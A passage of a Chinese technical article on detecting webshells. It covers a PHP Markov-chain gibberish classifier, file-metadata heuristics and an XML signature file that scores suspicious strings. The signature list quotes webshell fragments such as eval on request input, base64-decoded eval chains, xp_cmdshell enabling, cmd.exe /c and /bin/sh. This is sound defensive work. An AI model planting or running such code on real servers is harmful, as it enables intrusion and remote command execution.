020797;i:1;d:-8.2177061950993853;i:2;d:-5.8788998386710221;i:3;d:-9.5252196783661631;i:4;d:-2.3388918749787213;i:5;d:-7.1724024598857836;i:6;d:-8.4784324575626382;i:7;d:-1.1074718716074006;i:8;d:-2.3662341497302157;i:9;d:-10.456777882371107;i:10;d:-9.6895227296574387;i:11;d:-4.4185398552495441;i:12;d:-6.0323919738580827;i:13;d:-7.21960886445558;i:14;d:-2.3367153961191565;i:15;d:-8.1619148354709701;i:16;d:-10.719142146838596;i:17;d:-3.4624215669877803;i:18;d:-3.6797447588047447;i:19;d:-4.0251990917417855;i:20;d:-3.9002180815630756;i:21;d:-9.5559913370329159;i:22;d:-5.18259559155831;i:23;d:-10.131355481936478;i:24;d:-4.2047257961667839;i:25;d:-7.9847746374190134;i:26;d:-1.5835253210583506;}i:20;a:27:{i:0;d:-3.6907063474960813;i:1;d:-3.7341336409280999;i:2;d:-3.2454721262149633;i:3;d:-4.0206087126298451;i:4;d:-3.2812979786880589;i:5;d:-5.0172437658127595;i:6;d:-3.1933271849501734;i:7;d:-7.7963898885987;i:8;d:-3.7311188662600099;i:9;d:-9.3545345066452494;i:10;d:-6.2082293746118848;i:11;d:-2.257675168572427;i:12;d:-3.4112977818505237;i:13;d:-2.089862646254399;i:14;d:-6.0964379686237677;i:15;d:-3.1007056950697769;i:16;d:-8.9490693985370857;i:17;d:-1.905375903432984;i:18;d:-1.9722545836234537;i:19;d:-1.9648676140617645;i:20;d:-9.2744917989717131;i:21;d:-6.7831953510849425;i:22;d:-9.3545345066452494;i:23;d:-7.3176525793842098;i:24;d:-7.3735330377786665;i:25;d:-5.2671586137392428;i:26;d:-3.2700350935700784;}i:21;a:27:{i:0;d:-2.4677551327310105;i:1;d:-8.4660147229718206;i:2;d:-8.5613249027761462;i:3;d:-7.8681777222162008;i:4;d:-0.5192363285514866;i:5;d:-8.5613249027761462;i:6;d:-8.2989606383086549;i:7;d:-8.4660147229718206;i:8;d:-1.7429474349452256;i:9;d:-8.4660147229718206;i:10;d:-7.919471016603751;i:11;d:-5.4433749964979059;i:12;d:-8.5613249027761462;i:13;d:-4.566800675836256;i:14;d:-2.7892609207035393;i:15;d:-8.5613249027761462;i:16;d:-8.5613249027761462;i:17;d:-6.2687901456356014;i:18;d:-4.407140340198028;i:19;d:-7.9735382378740267;i:20;d:-6.2891990172668084;i:21;d:-8.3790033459821913;i:22;d:-8.030696651713976;i:23;d:-8.4660147229718206;i:24;d:-5.2581079294741944;i:25;d:-8.5613249027761462;i:26;d:-3.1228109057348257;}i:22;a:27:{i:0;d:-1.596798460957614;i:1;d:-7.6001421705956735;i:2;d:-7.6409641651159284;i:3;d:-5.3446486851354784;i:4;d:-1.8921021056868312;i:5;d:-6.8393363415619133;i:6;d:-8.1109677943616649;i:7;d:-1.6228272590921338;i:8;d:-1.7628783045649916;i:9;d:-8.8731078464085602;i:10;d:-7.0013056695069693;i:11;d:-5.4671598619878079;i:12;d:-8.1799606658486148;i:13;d:-3.2183655671770013;i:14;d:-2.5242186364713008;i:15;d:-8.293289351155618;i:16;d:-9.209580083029774;i:17;d:-4.5700084703243498;i:18;d:-4.2425484264156506;i:19;d:-5.6542320215403601;i:20;d:-7.560921457442392;i:21;d:-9.209580083029774;i:22;d:-7.3074725566328533;i:23;d:-9.209580083029774;i:24;d:-6.8774361877941841;i:25;d:-9.0272585262358191;i:26;d:-2.172728230713227;}i:23;a:27:{i:0;d:-2.2547809680334239;i:1;d:-6.8982098661386058;i:2;d:-2.0276032166460531;i:3;d:-6.4927447580304412;i:4;d:-2.4626424645366942;i:5;d:-5.8334991291461771;i:6;d:-6.8982098661386058;i:7;d:-4.3104458309108979;i:8;d:-2.0731012597852527;i:9;d:-6.8982098661386058;i:10;d:-6.8982098661386058;i:11;d:-6.4282062368928701;i:12;d:-6.7158883093446509;i:13;d:-6.8982098661386058;i:14;d:-4.4558628307694015;i:15;d:-1.4955324842663262;i:16;d:-6.3675816150764355;i:17;d:-4.6364467676648147;i:18;d:-5.7668077546475054;i:19;d:-1.8703897472882491;i:20;d:-4.3724812218303502;i:21;d:-4.3487646952130339;i:22;d:-6.802899686334281;i:23;d:-4.4734071404203108;i:24;d:-5.175443268397502;i:25;d:-6.8982098661386058;i:26;d:-2.5557039896270073;}i:24;a:27:{i:0;d:-3.8728743535324379;i:1;d:-6.0798383375596803;i:2;d:-5.6059562289853746;i:3;d:-6.1495716755743555;i:4;d:-2.9181087352006836;i:5;d:-5.8331401898365893;i:6;d:-6.9987231046108827;i:7;d:-7.3171768357294171;i:8;d:-3.8266394412494407;i:9;d:-8.857621876676566;i:10;d:-7.4507082283539399;i:11;d:-4.7453828245779146;i:12;d:-4.4478584870310849;i:13;d:-5.4481256921997154;i:14;d:-2.2255103117197566;i:15;d:-4.7372306055163644;i:16;d:-9.0399434334705209;i:17;d:-5.7515415459537094;i:18;d:-3.132676045163294;i:19;d:-4.2302010817536546;i:20;d:-7.0384634332603966;i:21;d:-7.6536490723506301;i:22;d:-6.2305407381080231;i:23;d:-7.7049423667381802;i:24;d:-8.1644746961166206;i:25;d:-7.731610613820342;i:26;d:-0.38178901910364238;}i:25;a:27:{i:0;d:-2.5311795993314572;i:1;d:-6.0031460518818198;i:2;d:-5.9078358720774951;i:3;d:-4.6948132322316409;i:4;d:-0.92922301854964551;i:5;d:-5.9078358720774951;i:6;d:-6.0031460518818198;i:7;d:-3.199785670975285;i:8;d:-2.3395844057521735;i:9;d:-6.0031460518818198;i:10;d:-5.6666738152606069;i:11;d:-3.8868905370792679;i:12;d:-4.0016660516716955;i:13;d:-5.0098942788715366;i:14;d:-1.7362497244615696;i:15;d:-6.0031460518818198;i:16;d:-6.0031460518818198;i:17;d:-6.0031460518818198;i:18;d:-5.8208244950878649;i:19;d:-5.9078358720774951;i:20;d:-3.1183453390351104;i:21;d:-5.6666738152606069;i:22;d:-5.9078358720774951;i:23;d:-6.0031460518818198;i:24;d:-4.5680615265924969;i:25;d:-3.7731316517226094;i:26;d:-3.1699327078256037;}i:26;a:27:{i:0;d:-2.154456318300654;i:1;d:-3.1320289092329041;i:2;d:-3.2042402732214348;i:3;d:-3.5547759660800491;i:4;d:-3.8320798875631166;i:5;d:-3.2625149066892174;i:6;d:-4.1318426237305275;i:7;d:-2.7847122791384975;i:8;d:-2.7534204117779435;i:9;d:-5.68607428491371;i:10;d:-5.2715182051042939;i:11;d:-3.7797926294683339;i:12;d:-3.3524684982622079;i:13;d:-3.8123859357235683;i:14;d:-2.6445324753284249;i:15;d:-3.3676057306367433;i:16;d:-6.2378725360564378;i:17;d:-3.6809218434868227;i:18;d:-2.7030074975159986;i:19;d:-1.86142386740762;i:20;d:-4.4723885304095425;i:21;d:-4.9186968304815517;i:22;d:-2.8042850405884527;i:23;d:-7.7839495282823838;i:24;d:-4.7020395584873409;i:25;d:-8.486442571260568;i:26;d:-3.2910629924454486;}}s:9:"threshold";d:0.027138686673887656;}
前期样本训练
//样本训练 public static function train($big_text_file, $good_text_file, $bad_text_file, $lib_path) { if(is_file($big_text_file) === false || is_file($good_text_file) === false || is_file($bad_text_file) === false) { return false; } //$_accepted_characters = "abcdefghijklmnopqrstuvwxyz" $k = strlen(self::$_accepted_characters); /* $pos = array( 'a' => 0, 'b' => 1, 'c' => 2, .. ); */ $pos = array_flip(str_split(self::$_accepted_characters)); // Assume we have seen 10 of each character pair. This acts as a kind of // prior or smoothing factor. This way, if we see a character transition // live that we've never observed in the past, we won't assume the entire // string has 0 probability. $log_prob_matrix = array(); $range = range(0, count($pos)-1); //生成26 * 26的正方矩阵 foreach ($range as $index1) { $array = array(); foreach ($range as $index2) { $array[$index2] = 10; } $log_prob_matrix[$index1] = $array; } // Count transitions from big text file, taken // from http://norvig.com/spell-correct.html $lines = file($big_text_file); foreach ($lines as $line) { /* Return all n grams from l after normalizing 对训练样本进行规范化,即只保留26英文字母 */ $filtered_line = str_split(self::_normalise($line)); $a = false; foreach ($filtered_line as $b) { if($a !== false) { //针对二阶紧邻词语的二阶马尔柯夫链 $log_prob_matrix[$pos[$a]][$pos[$b]] += 1; } $a = $b; } } //释放内存 unset($lines, $filtered_line); // Normalize the counts so that they become log probabilities. // We use log probabilities rather than straight probabilities to avoid // numeric underflow issues with long texts. // This contains a justification: // http://squarecog.wordpress.com/2009/01/10/dealing-with-underflow-in-joint-probability-calculations/ foreach ($log_prob_matrix as $i => $row) { //某个字母的二阶马尔科夫和,例如以"a"开头的二阶词语的词频总和 $s = (float) array_sum($row); foreach($row as $k => $j) { //对26 * 26二阶马尔科夫链矩阵进行规范化(平均值) $log_prob_matrix[$i][$k] = log( $j / $s); } } // Find the probability of generating a few arbitrarily choosen good and // bad phrases. $good_lines = file($good_text_file); $good_probs = array(); foreach ($good_lines as $line) { array_push($good_probs, self::_averageTransitionProbability($line, $log_prob_matrix)); } $bad_lines = file($bad_text_file); $bad_probs = array(); foreach ($bad_lines as $line) { array_push($bad_probs, self::_averageTransitionProbability($line, $log_prob_matrix)); } // Assert that we actually are capable of detecting the junk. $min_good_probs = min($good_probs); $max_bad_probs = max($bad_probs); if($min_good_probs <= $max_bad_probs) { return false; } // And pick a threshold halfway between the worst good and best bad inputs. $threshold = ($min_good_probs + $max_bad_probs) / 2; // save matrix return file_put_contents($lib_path, serialize(array( 'matrix' => $log_prob_matrix, 'threshold' => $threshold, ))) > 0; }
得到分类器阀值$threshold
//And pick a threshold halfway between the worst good and best bad inputs. $threshold = ($min_good_probs + $max_bad_probs) / 2;
可疑样本检测
public static function test($text, $lib_path, $raw=false) { if(file_exists($lib_path) === false) { // TODO throw error? return -1; } $trained_library = unserialize(file_get_contents($lib_path)); if(is_array($trained_library) === false) { // TODO throw error? return -1; } $value = self::_averageTransitionProbability($text, $trained_library['matrix']); if($raw === true) { return $value; } if($value <= $trained_library['threshold']) { return true; } return false; }
基于马尔柯夫链算法的元音WEBSHELL判断本质上还是一个聚类过程,通过对基础语料库、正例语料库、反例语料库的马尔科夫建模,获得了一个"二阶词语序列理论预测指数",而聚类的阀值就是待检测可疑样本和这个预测指数的偏移度,这个预测指数的计算是根据正例语料库和反例语料库的马尔科夫平均矩阵取平均得到的
1. 如果待检测可疑样本和序列的预测指数的偏离度大于这个阀值,则判定为: "原因字符串" 2. 反之如果小于阀值,则判定为: "非元音字符串"
在将马尔柯夫链应用到实际的WEBSHELL检测中,发现存在以下几个困难点
1. 选取正例样本(正常网站文件)、反例样本(恶意WEBSHELL文件)的信息提取维度很难确定,对于基于隐式马尔柯夫链的元音词语判断来说,它的确很适合在域名、文章有效性检测领域发挥作用,但是把这个思想应用到WEBSHELL检测上,WEBSHELL本质上是脚本文件,是一行行的离散的数学公式(代码),在实验中,我提取了变量、字符串这2个维度进行马尔柯夫链聚类判断 2. 在实际实验中发现,正常网站文件和恶意WEBSHELL计算得到的马尔科夫偏离指数很接近,甚至产生反转现象(即两类聚类反向重合了),这就完全无法进行聚类分类了
Relevant Link:
http://stackoverflow.com/questions/4672822/how-to-test-if-a-string-contains-gibberish-in-php https://github.com/buggedcom/Gibberish-Detector-PHP https://github.com/rrenaud/Gibberish-Detector http://baike.baidu.com/view/340221.htm http://zh.wikipedia.org/zh-cn/%E9%A9%AC%E5%B0%94%E5%8F%AF%E5%A4%AB%E9%93%BE http://en.wikipedia.org/wiki/Precision_and_recall http://drops.wooyun.org/tips/6220
0x3: 连续 vs 分散
通过进一步观察我们可以发现,变形WEBSHELL的随机性也表现在连续出现的字母和数字上。一般经过变形加密的WEBSHELL都不会出现大段连续的数字或者连续出现相同的字母。同时因为英文字母分布里辅音字母远多于元音字母,变形WEBSHELL更可能连续反复出现辅音字母,而合法网站文件中的代码为了好念多是元音辅音交替
0x2: ID3决策树
Relevant Link:
http://www.xuebuyuan.com/1482392.html
9. 基于文件元信息进行可疑判断
在进行webshell判断的时候,除了文本自身的特征之外,文件本身及其在目录中的元信息也可以作为判断可疑文件的依据
1. 当前目录下是否有某个文件的元信息,包括 1) 创建时间 2) 修改时间 和当前目录下的其他文件的差别很大,则对当前文件的判断分值加权(即提高判断为webshell的成功率) 2. 当前文件的属主是否和当前目录下的其他文件差别很大
10. 基于client+server粗细粒度的webshell检测
0x1: Client检测: 感知能力
客户端采用粗粒度规则,目的是提高疑似文件的覆盖度,在误报(将正常文件识别为疑似WEBSHELL)概率可接受的前提下,尽量提高准确命中率(将恶意WEBSHELL识别为疑似WEBSHELL),客户端的拉网式检测主要由以下步骤组成
1. 过滤出我们关注的文件后缀类型 1) PHP WEBSHELL 1.1) .php 1.2) .php4 1.3) .php5 1.4) .inc 2) ASP WEBSHELL 2.1) .asp 2.2) .asa 2.3) .cer 2.4) .cdx 2.5) .aspx 3) JSP WEBSHELL 3.1) .jsp 4) SCRIPT WEBSHELL 4.1) .pl 4.2) .py 4.3) .sh 5) Zombie WEBSHELL 4.1) aux. 4.2) prn. 4.3) con. 4.4) nul. 4.5) com1. 4.6) com2. 4.7) com3. 4.8) com4. 4.9) com5. 4.10) com6. 4.11) com7. 4.12) com8. 4.13) com9. 4.14) lpt1. 4.15) lpt2. 4.16) lpt3. 4.17) lpt4. 4.18) lpt5. 4.19) lpt6. 4.20) lpt7. 4.21) lpt8. 4.22) lpt9. 2. 根据不同的文件扩展名类别分别应用不同的[字符串特征、正则]匹配,计算最后规则匹配的分值权重,将超过70分的疑似文件上报 3. 当前目录下的某个文件和当前目录下的其他文件的差别很大,则对当前文件的判断分值加权(即提高判断为webshell的成功率) 4. 当前文件的属主是否和当前目录下的其他文件差别很大
客户端粗粒度检测规则
decode.xml
<?xml version="1.0"?> <LEX> <Isparser>0</Isparser> <Version>2015-01-08</Version> <ASP> <WEBSHELL> <ITEM><STR>/mb/js.js"></script></STR><NUM>30</NUM></ITEM> <ITEM><STR>/mb/2.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>/mb/3.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>server.scripttimeout</STR><NUM>70</NUM></ITEM> <ITEM><STR>Branch_directory_13=getCode(Rand(3,5))</STR><NUM>70</NUM></ITEM> <ITEM><STR>Dim XBCode</STR><NUM>20</NUM></ITEM> <ITEM><STR>(XBCode)</STR><NUM>50</NUM></ITEM> <ITEM><STR>gif87a</STR><NUM>70</NUM></ITEM> <ITEM><STR>Then Execute(Session("lcx"</STR><NUM>70</NUM></ITEM> <ITEM><STR>Response.Write(eval(Request.Item</STR><NUM>70</NUM></ITEM> <ITEM><STR>GetObject("IIS://127.0.0.1/W3SVC/"</STR><NUM>40</NUM></ITEM> <ITEM><STR>Marcos</STR><NUM>70</NUM></ITEM> <ITEM><STR>chopper</STR><NUM>70</NUM></ITEM> <ITEM><STR>HYTop.mdb</STR><NUM>70</NUM></ITEM> <ITEM><STR>C:\\Progra~1</STR><NUM>10</NUM></ITEM> <ITEM><STR>Servu</STR><NUM>10</NUM></ITEM> <ITEM><STR>LyfUpload.UploadFile</STR><NUM>10</NUM></ITEM> <ITEM><STR>cmd.exe</STR><NUM>10</NUM></ITEM> <ITEM><STR>ServerVariables("SERVER_SOFTWARE")</STR><NUM>5</NUM></ITEM> <ITEM><STR>Environment.GetLogicalDrives</STR><NUM>20</NUM></ITEM> <ITEM><STR>Evilspy</STR><NUM>80</NUM></ITEM> <ITEM><STR>GetObject("WinNT://</STR><NUM>50</NUM></ITEM> <ITEM><STR>webshell</STR><NUM>40</NUM></ITEM> <ITEM><STR>WebAdmin2Y.x.y("add6bb58e139be10")</STR><NUM>70</NUM></ITEM> <ITEM><STR>GIF89a</STR><NUM>70</NUM></ITEM> <ITEM><STR>lake2</STR><NUM>30</NUM></ITEM> <ITEM><STR>.GetFolder(</STR><NUM>10</NUM></ITEM> <ITEM><STR>Password</STR><NUM>10</NUM></ITEM> <ITEM><STR>UserPass</STR><NUM>10</NUM></ITEM> <ITEM><STR>VBScript.Encode</STR><NUM>70</NUM></ITEM> <ITEM><STR>VBScript.encode</STR><NUM>70</NUM></ITEM> <ITEM><STR>.CreateTextFile</STR><NUM>20</NUM></ITEM> <ITEM><STR>ipconfig -all</STR><NUM>30</NUM></ITEM> <ITEM><STR>kj021320</STR><NUM>70</NUM></ITEM> <ITEM><STR>unhonker.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>xiaf.info</STR><NUM>70</NUM></ITEM> <ITEM><STR>22dm.net</STR><NUM>70</NUM></ITEM> <ITEM><STR>cmd.exe /c</STR><NUM>50</NUM></ITEM> <ITEM><STR>RegEdit.exe /e</STR><NUM>50</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>30</NUM></ITEM> <ITEM><STR>net user</STR><NUM>30</NUM></ITEM> <ITEM><STR>string jksessionpass</STR><NUM>30</NUM></ITEM> <ITEM><STR>ASPYDrvsInfo</STR><NUM>70</NUM></ITEM> <ITEM><STR>.CopyFolder</STR><NUM>5</NUM></ITEM> <ITEM><STR>.deletefile</STR><NUM>10</NUM></ITEM> <ITEM><STR>.ComputerName</STR><NUM>10</NUM></ITEM> <ITEM><STR>.CopyFile</STR><NUM>5</NUM></ITEM> <ITEM><STR>LocalAdministrator</STR><NUM>10</NUM></ITEM> <ITEM><STR>Serv-U</STR><NUM>20</NUM></ITEM> <ITEM><STR>System.Environment.SystemDirectory</STR><NUM>30</NUM></ITEM> <ITEM><STR>System.Net.Sockets</STR><NUM>10</NUM></ITEM> <ITEM><STR>System.Diagnostics</STR><NUM>10</NUM></ITEM> <ITEM><STR>System.DirectoryServices</STR><NUM>10</NUM></ITEM> <ITEM><STR>System.ServiceProcess</STR><NUM>10</NUM></ITEM> <ITEM><STR>new Socket(</STR><NUM>10</NUM></ITEM> <ITEM><STR>wscript.shell</STR><NUM>20</NUM></ITEM> <ITEM><STR>Runtime.getRuntime(</STR><NUM>20</NUM></ITEM> <ITEM><STR>xp_cmdshell</STR><NUM>20</NUM></ITEM> <ITEM><STR>Microsoft.XMLHTTP</STR><NUM>5</NUM></ITEM> <ITEM><STR>System.Reflection.Assembly.Load(Request.BinaryRead</STR><NUM>20</NUM></ITEM> <ITEM><STR>WScript.Shell</STR><NUM>20</NUM></ITEM> <ITEM><STR>FileOutputStream</STR><NUM>10</NUM></ITEM> <ITEM><STR>72C24DD5-D70A-438B-8A42-98424B88AFB8</STR><NUM>40</NUM></ITEM> <ITEM><STR>F935DC22-1CF0-11D0-ADB9-00C04FD58A0B</STR><NUM>30</NUM></ITEM> <ITEM><STR>13709620-C279-11CE-A49E-444553540000</STR><NUM>30</NUM></ITEM> <ITEM><STR>093FF809-1EA0-4079-9525-9614C3504B74</STR><NUM>20</NUM></ITEM> <ITEM><STR>F935DC26-1CF0-11D0-ADB9-00C04FD58A0B</STR><NUM>20</NUM></ITEM> <ITEM><STR>0D43FE01-F093-11CF-8940-00A0C9054228</STR><NUM>20</NUM></ITEM> <ITEM><STR>Scripting.FileSystemObject</STR><NUM>10</NUM></ITEM> <ITEM><STR>ADODB.Stream</STR><NUM>10</NUM></ITEM> <ITEM><STR>BackDoor</STR><NUM>20</NUM></ITEM> <ITEM><STR>command.com</STR><NUM>70</NUM></ITEM> <ITEM><STR>uploadvirus</STR><NUM>70</NUM></ITEM> <ITEM><STR>s;xvj4kjmx}4LkYMb@#@&?4kUlU6(L/D.P{PI2sl1+v?4kjC</STR><NUM>70</NUM></ITEM> <ITEM><STR>hack.cctve.cn</STR><NUM>70</NUM></ITEM> <ITEM><STR>fuckanquangoutezheng</STR><NUM>80</NUM></ITEM> <ITEM><STR>OleDbConnection(session("DBC")) instr(DB_CString.Text,":\")</STR><NUM>80</NUM></ITEM> <ITEM><STR>sk8t9hSDALYDYBi0HCaGRxSgH5KgABYDYBg4Q</STR><NUM>80</NUM></ITEM> <ITEM><STR>crypt_PRO="0mWm2/,5</STR><NUM>80</NUM></ITEM> <ITEM><STR>WICXlQa33rNDnBUKHvXcMsQmWDL4e</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[#@~^k0oAAA==@#@&D]kJ@!tYsV@*@!]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>$adminport=43958;</STR><NUM>80</NUM></ITEM> <ITEM><STR>SessionName="ASPXSpy";</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)]]></STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[-SETDOMAIN"&vbcrlf&"-Domain=cctv|0.0.0.0|43859|-1|1|0"]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>ShowFolder("C:\\RECYCLER</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[http://127.0.0.1:"&port&"/goldsun/upadmin/s1]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>Addxp_cmdshell(SQL2005)</STR><NUM>60</NUM></ITEM> <ITEM><STR>awen asp.net webshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>void cmdExe_Click(object sender, System.EventArgs e)</STR><NUM>80</NUM></ITEM> <ITEM><STR>AK-74 Security Team Web Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;\</STR><NUM>80</NUM></ITEM> <ITEM><STR>Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[Rp=Co&"?pw="&Server.URlEncode(Request("jl"))&"&ib="&Request("ib")]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>1902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B19</STR><NUM>80</NUM></ITEM> <ITEM><STR><![CDATA[s"&"cri"&"pting"&"."&"Fil"&"eSy"&"stemO"&"bject]]></STR><NUM>80</NUM></ITEM> <ITEM><STR>spider,robot,Baidu,Google,360spider,sogou,soso</STR><NUM>60</NUM></ITEM> <ITEM><STR>googlebot|baiduspider|sogou|yahoo|soso</STR><NUM>60</NUM></ITEM> <ITEM><STR>,"baiduspider","yahoo! slurp","inktomi","msnbot","</STR><NUM>60</NUM></ITEM> <ITEM><STR>bfafsfef6f4f_ffdffeffcffoffdffef</STR><NUM>80</NUM></ITEM> <ITEM><STR>createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")</STR><NUM>80</NUM></ITEM> <ASPRULE> <ITEM>[^\w](Eval|eval|Execute|execute|Eval_r|ExecuteGlobal).{0,3}(UnEncode|request|Request|session|Request.Item|Request.form|Session)(\(|\[)[^\{\}]{0,22}\)</ITEM> </ASPRULE> </WEBSHELL> <INFORMATION> <ITEM><STR>new Socket(AddressFamily.InterNetwork, SocketTyp</STR><NUM>60</NUM></ITEM> <ITEM><STR>DDosAttack</STR><NUM>70</NUM></ITEM> <ITEM><STR>Attack_Get()</STR><NUM>10</NUM></ITEM> <ITEM><STR>Attack_Post()</STR><NUM>10</NUM></ITEM> <ASPRULE> <ITEM></ITEM> </ASPRULE> </INFORMATION> <SEO> <ITEM><STR>/mb/js.js"></script></STR><NUM>30</NUM></ITEM> <ITEM><STR>/mb/2.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>/mb/3.css"</STR><NUM>20</NUM></ITEM> <ITEM><STR>351031729</STR><NUM>70</NUM></ITEM> <ITEM><STR>tophack.net</STR><NUM>70</NUM></ITEM> <ASPRULE> <ITEM></ITEM> </ASPRULE> </SEO> <ADDITIONALRULL> <WEBSHELL> <ITEM> <STR>tseuqer lave</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>codepage=65000</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>"D","7","S","O","q","G","j","l","z","4","L","k","m","x","0","c","v"</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>97a103a101a110a116a61a114a101a113a117a101a115a116a46a115a10</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR><![CDATA[<%a=request("x")%>]]></STR> <NUM>70</NUM> </ITEM> </WEBSHELL> </ADDITIONALRULL> <EXT> <ITEM>.asp</ITEM> <ITEM>.asa</ITEM> <ITEM>.cer</ITEM> <ITEM>.cdx</ITEM> <ITEM>.aspx</ITEM> </EXT> <LIKEEXT> <ITEM><![CDATA[.asp;]]></ITEM> </LIKEEXT> <BEGINEXT> <ITEM>aux.</ITEM> <ITEM>prn.</ITEM> <ITEM>con.</ITEM> <ITEM>nul.</ITEM> <ITEM>com1.</ITEM> <ITEM>com2.</ITEM> <ITEM>com3.</ITEM> <ITEM>com4.</ITEM> <ITEM>com5.</ITEM> <ITEM>com6.</ITEM> <ITEM>com7.</ITEM> <ITEM>com8.</ITEM> <ITEM>com9.</ITEM> <ITEM>lpt1.</ITEM> <ITEM>lpt2.</ITEM> <ITEM>lpt3.</ITEM> <ITEM>lpt4.</ITEM> <ITEM>lpt5.</ITEM> <ITEM>lpt6.</ITEM> <ITEM>lpt7.</ITEM> <ITEM>lpt8.</ITEM> <ITEM>lpt9.</ITEM> </BEGINEXT> </ASP> <PHP> <WEBSHELL> <ITEM><STR>MCL090810</STR><NUM>80</NUM></ITEM> <ITEM><STR>www.mianshamuma.com</STR><NUM>80</NUM></ITEM> <ITEM><STR>preg_replace(</STR><NUM>30</NUM></ITEM> <ITEM><STR>$password</STR><NUM>10</NUM></ITEM> <ITEM><STR>'e'.'v'.'a'.'l'</STR><NUM>40</NUM></ITEM> <ITEM><STR>$_GET["woaini"]=="91ri"</STR><NUM>80</NUM></ITEM> <ITEM><STR>base64_decode(</STR><NUM>10</NUM></ITEM> <ITEM><STR>eval(</STR><NUM>10</NUM></ITEM> <ITEM><STR>exec(</STR><NUM>10</NUM></ITEM> <ITEM><STR>passthru(</STR><NUM>10</NUM></ITEM> <ITEM><STR>system(</STR><NUM>10</NUM></ITEM> <ITEM><STR>shell_exec(</STR><NUM>10</NUM></ITEM> <ITEM><STR>proc_open(</STR><NUM>10</NUM></ITEM> <ITEM><STR>pcntl_exec(</STR><NUM>10</NUM></ITEM> <ITEM><STR>into outfile</STR><NUM>20</NUM></ITEM> <ITEM><STR>load_file(</STR><NUM>20</NUM></ITEM> <ITEM><STR>.htaccess</STR><NUM>10</NUM></ITEM> <ITEM><STR>udfdll</STR><NUM>35</NUM></ITEM> <ITEM><STR>shellcode</STR><NUM>55</NUM></ITEM> <ITEM><STR>@popen(</STR><NUM>10</NUM></ITEM> <ITEM><STR>SetHandler application/x-httpd-php</STR><NUM>40</NUM></ITEM> <ITEM><STR>preg_replace($exif['Make'],$exif['Model'],'')</STR><NUM>80</NUM></ITEM> <ITEM><STR>oo0o0O0o00oOo0O0o0OoO</STR><NUM>80</NUM></ITEM> <ITEM><STR>Eval(base64_decode(file_get_contents(base64_decode</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(base64_decode(</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(gzinflate(str_rot13(base64_decode(</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(gzinflate(base64_decode(</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(gzuncompress(base64_decode(</STR><NUM>80</NUM></ITEM> <ITEM><STR>eval(str_rot13(</STR><NUM>80</NUM></ITEM> <ITEM><STR>TG9jYXRpb24</STR><NUM>79</NUM></ITEM> <ITEM><STR>base64_decode("4D5A90000300000004</STR><NUM>80</NUM></ITEM> <ITEM><STR>0x4d5a4b45524e454c33322e444c4c00004c6f61644c6962726172794</STR><NUM>80</NUM></ITEM> <ITEM><STR>langouster_udf.dll</STR><NUM>80</NUM></ITEM> <ITEM><STR>urldecode("%6E1%7A%62%2F%6D%615%5C</STR><NUM>80</NUM></ITEM> <ITEM><STR>$b33 = $_SERVER['DOCUMENT_ROOT']</STR><NUM>80</NUM></ITEM> <ITEM><STR>passthru($cmd)</STR><NUM>80</NUM></ITEM> <ITEM><STR>PHP Web Shell</STR><NUM>80</NUM></ITEM> <ITEM><STR>P.h.p.S.p.y</STR><NUM>80</NUM></ITEM> <ITEM><STR>PhpShell</STR><NUM>80</NUM></ITEM> <ITEM><STR>phpshell</STR><NUM>80</NUM></ITEM> <ITEM><STR>w4ck1ng</STR><NUM>80</NUM></ITEM> <ITEM><STR>GIF89a</STR><NUM>80</NUM></ITEM> <ITEM><STR>PhpSpy</STR><NUM>80</NUM></ITEM> <ITEM><STR>_pass</STR><NUM>1</NUM></ITEM> <ITEM><STR>b374k</STR><NUM>79</NUM></ITEM> <ITEM><STR>milw0rm</STR><NUM>80</NUM></ITEM> <ITEM><STR>c80</STR><NUM>10</NUM></ITEM> <ITEM><STR>c100</STR><NUM>10</NUM></ITEM> <ITEM><STR>STUNSHELL</STR><NUM>80</NUM></ITEM> <ITEM><STR>FaTaLisTiCz</STR><NUM>80</NUM></ITEM> <ITEM><STR>Fx29SheLL</STR><NUM>80</NUM></ITEM> <ITEM><STR>backdoor</STR><NUM>20</NUM></ITEM> <ITEM><STR>back_connect</STR><NUM>60</NUM></ITEM> <ITEM><STR>r57</STR><NUM>10</NUM></ITEM> <ITEM><STR>Pr!v8</STR><NUM>80</NUM></ITEM> <ITEM><STR>webadmin</STR><NUM>10</NUM></ITEM> <ITEM><STR>PHPJackal</STR><NUM>80</NUM></ITEM> <ITEM><STR>C80madShell</STR><NUM>80</NUM></ITEM> <ITEM><STR>Ve_cENxShell</STR><NUM>80</NUM></ITEM> <ITEM><STR>ipconfig -all</STR><NUM>30</NUM></ITEM> <ITEM><STR>cmd.exe /c</STR><NUM>60</NUM></ITEM> <ITEM><STR>/bin/sh</STR><NUM>30</NUM></ITEM> 